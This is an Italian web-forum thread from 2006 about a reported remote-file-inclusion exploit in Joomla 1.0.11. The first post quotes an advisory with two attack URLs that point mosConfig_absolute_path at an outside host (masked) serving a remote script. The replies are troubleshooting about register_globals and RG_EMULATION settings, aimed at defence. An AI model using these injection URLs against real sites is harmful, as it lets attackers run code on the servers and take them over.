Back to top

Autore Topic: Importantissimo!!! Nuovo Exploit su Joomla .11 !!!  (Letto 2494 volte)

Offline matthz

  • Esploratore
  • **
  • Post: 105
    • Mostra profilo
Importantissimo!!! Nuovo Exploit su Joomla .11 !!!
« il: 10 Nov 2006, 13:28:28 »
Attenzione un amico mi ha inviato questa mail, a quanto pare hanno bucato anche quest'ultima versione di joomla!
Se qualcuno sa come patchare il sistema avverta al più presto!

Author : Super-Crystal
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==

website: http://www.joomla.org/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Bug : include_once ( $mosConfig_absolute_path . '/language/'.
$mosConfig_lang .'.php' );

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Exploit :
www.target.com/script_path/installation/index.php?mosConfig_absolute_path=ht
tp://***********/c-h.v2.txt?
------>
www.target.com/script_path/administrator/components/com_admin/admin.admin.ht
ml.php?mosConfig_absolute_path=http://***********/c-h.v2.txt?



Script Download
http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomla/frs.joomla_1_
0.1_0_11/frs6654;jsessionid=860E9B227E096AAC4453A3B1FDCE77F5?dl=1


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Arab4Services Team  www.arab4services.com :)

Offline napo

  • Instancabile
  • ******
  • Post: 6532
  • Sesso: Maschio
  • NO MP TECNICI, verranno ignorati
    • Mostra profilo
Re: Importantissimo!!! Nuovo Exploit su Joomla .11 !!!
« Risposta #1 il: 10 Nov 2006, 13:32:01 »
Com'è settato register_globals?
Sarà senz'altro a ON, se sono riusciti a sfondare.
Ma in quale file sarebbe il "bug"?
« Ultima modifica: 10 Nov 2006, 13:35:30 da -napo- »


AllOne.it Consulting: http://www.allone.it Gens Joomla, il : http://www.gensjoomla.org  [url=http://www.allone.it/jooml

Offline matthz

  • Esploratore
  • **
  • Post: 105
    • Mostra profilo
Re: Importantissimo!!! Nuovo Exploit su Joomla .11 !!!
« Risposta #2 il: 10 Nov 2006, 13:35:03 »
Dalle info delle impostazioni di Joomla io ce l'ho settato così:
                      (local master)
register_globals   Off   Off

Offline matthz

  • Esploratore
  • **
  • Post: 105
    • Mostra profilo
Re: Importantissimo!!! Nuovo Exploit su Joomla .11 !!!
« Risposta #3 il: 10 Nov 2006, 13:38:29 »
No scusa, a me non hanno sfondato niente, ho solo segnalato un nuovo exploit, tutto lì. Non si sa mai... quando mi avvertono di queste cose mi preoccupo subito.
Non ti saprei dire di più, questo è tutto quello che mi hanno inviato (solo non ho postao l'url dove risiede lo script anche se è facile immaginarlo), infatti chiedo lumi.

Offline napo

  • Instancabile
  • ******
  • Post: 6532
  • Sesso: Maschio
  • NO MP TECNICI, verranno ignorati
    • Mostra profilo
Re: Importantissimo!!! Nuovo Exploit su Joomla .11 !!!
« Risposta #4 il: 10 Nov 2006, 13:39:39 »
RG_EMULATION com'è settato?


AllOne.it Consulting: http://www.allone.it Gens Joomla, il : http://www.gensjoomla.org  [url=http://www.allone.it/jooml

Offline matthz

  • Esploratore
  • **
  • Post: 105
    • Mostra profilo
Re: Importantissimo!!! Nuovo Exploit su Joomla .11 !!!
« Risposta #5 il: 10 Nov 2006, 13:41:43 »
define( 'RG_EMULATION', 0 );

Ma come ti ripeto, non mi hanno bucato, ho solo riportato una mail che mi hanno inviato per avvertirmi, e chiedevo lumi su eventuali patch, oltre che avvertira naturalmente.

Offline napo

  • Instancabile
  • ******
  • Post: 6532
  • Sesso: Maschio
  • NO MP TECNICI, verranno ignorati
    • Mostra profilo
Re: Importantissimo!!! Nuovo Exploit su Joomla .11 !!!
« Risposta #6 il: 10 Nov 2006, 13:46:39 »
Però se non mi dici quale sarebbe il file vulnerabile, serve a poco.


AllOne.it Consulting: http://www.allone.it Gens Joomla, il : http://www.gensjoomla.org  [url=http://www.allone.it/jooml

 



Web Design Bolzano Kreatif